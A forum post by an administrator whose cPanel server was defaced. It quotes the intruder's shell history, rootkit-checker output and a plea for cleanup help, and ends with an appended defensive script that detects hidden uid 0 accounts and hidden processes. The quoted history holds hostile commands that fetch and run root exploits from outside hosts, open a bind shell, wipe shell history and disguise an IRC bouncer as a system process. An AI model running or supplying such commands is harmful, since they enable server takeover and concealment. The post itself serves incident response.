just got hacked
moving to a new server, and after a few hours got hacked
all index.* have been replaced
including all cpanel themes and all clients
so when you log on to http://server/cpanel
or http://server/webmail
all you see is the hacker page
http://vipixel.com/hacked.jpg
I can delete the username techteam, whose uid is 0,
but how do I remove the hidden Trojan?
it says it has a hidden pid:
Code:
uid 0 account (techteam) - BAD!
--> Hidden Pid detected! [pid 10]
--> hidden from ps: [yes]
--> hidden from kernel: [yes]
here's the log I can grab:
Code:
ls
./pt
./kmod
./own
./klogd
./kmod
rm kmod
rm -rf kmod
wget www.viperhaxu.hpg.com.br/ptrace
chmod ptrace
chmod 777 ptrace
./ptrace
wget www.skater0x.hpg.com.br/local/kmod
chmod 777 kmod.1
./kmod.1
./newlocal
gcc fedor.c -o fedor
ls
./f
uname -a
chmod 777 f
./f
id
pwd
wget www.skater0x.hpg.com.br/xpll/cancer
echo SU3D OWNZ > index.txt
chmod 777 cancer
./cancer index.txt
ls
rm bind.txt
ls -la
cat .bash_history
ls
./kmod
./cbd
./cbd 10.28.88.142
cat fedor.c
./f
./ptrace
c
./pt
z
ls
ls
./setuid
id
./ptrace
./own
./ptrace
wget www.creatividade.hpg.com.br/locals
chmod 777 locals
./locals
./locals
./locals
rm -rf locals
ls
./ptrace
echo lol >.bash_history
ls
./td
id
./pt
id
./td
ls
w
id
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
wget thecoreteam.home.ro/pt
chmod +x pt
./pt
./pt
./pt
./pt
./pt
wget www.geocities.com/sorin_smen/psybnc.tgz
ls
rm -rf *
cd ..
ls
rm -rf *
ls
./newlocal
./localroot
./own
./kmod
rm -rf *
chmod +wrx setuid
id
ls -all
ls
rm -rf sess_fc187590539417321dd72b37686e7e27
cd www.geocities.com/sorin_smen/psybnc.tgz
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
wget www.geocities.com/sorin_smen/psybnc.tgz
tar zxvf psybnc.tgz
cd psybnc
./psybnc
kill -9 32751
rm -rf psybnc.conf
wget thecoreteam.home.ro/psybnc.conf
mv psybnc "squid -D"
./"squid -D"
exit
id
./km
ls
ls -al km
./km
./km
./km;./km;./km
exit
i run this:
Code:
[~/apps/chkrootkit-0.42b]# ./chkrootkit
Checking `bindshell'... INFECTED (PORTS: 465)
but it seems a false alarm...
how do I cleanly remove the trojan file?
please please help.
FYI the server is updated to the latest kernel, 2.4.23,
but we're still worried about this mass defacement attack.
mind sharing tips and tricks on security settings for WHM/CPanel?
Thanks in advance,
Brumie
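The two findings the checker flagged in the post (a second uid 0 login and a PID hidden from /proc) can be cross-checked with a small script of the kind below. This is an added example, not code from the post or from chkrootkit; the passwd content is constructed, and the PID check is the usual comparison of readdir("/proc") against a kill(pid, 0) brute-force probe.

```python
import os
# Constructed sample of /etc/passwd (not from the post): a second uid 0 login
# sits next to root, the condition the checker reported as "BAD!".
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
techteam:x:0:0::/home/techteam:/bin/bash
brumie:x:500:500::/home/brumie:/bin/bash
"""

def extra_uid0_accounts(passwd_text):
    """Usernames with uid 0 other than root; any unexpected hit is a backdoor."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 3 or not fields[2].isdigit():
            continue  # blank or malformed line
        if int(fields[2]) == 0 and fields[0] != "root":
            found.append(fields[0])
    return found

def hidden_pids(listed, probed):
    """PIDs that answered a probe but are absent from the /proc listing.
    Take both snapshots back to back and repeat: a process that exits
    between them shows up as a one-off false positive."""
    return sorted(set(probed) - set(listed))

def listed_proc_pids():
    """PIDs as readdir("/proc") reports them, which is all ps ever sees."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}

def probe_live_pids(max_pid=32768):
    """kill(pid, 0) on every PID: ESRCH means none, success or EPERM means it
    exists even when /proc readdir hides it (32768 fits a 2.4 kernel; check
    /proc/sys/kernel/pid_max). A rootkit that also filters kill() evades this."""
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass  # exists, owned by someone else
        alive.add(pid)
    return alive

if __name__ == "__main__":
    with open("/etc/passwd") as fh:
        print("extra uid 0 accounts:", extra_uid0_accounts(fh.read()))
    print("hidden pids:", hidden_pids(listed_proc_pids(), probe_live_pids()))
```

An empty result from the probe is not proof the host is clean; a kernel-level rootkit can filter kill() as well as readdir, so a box with a known uid 0 backdoor and a hidden PID should be rebuilt from trusted media rather than cleaned in place.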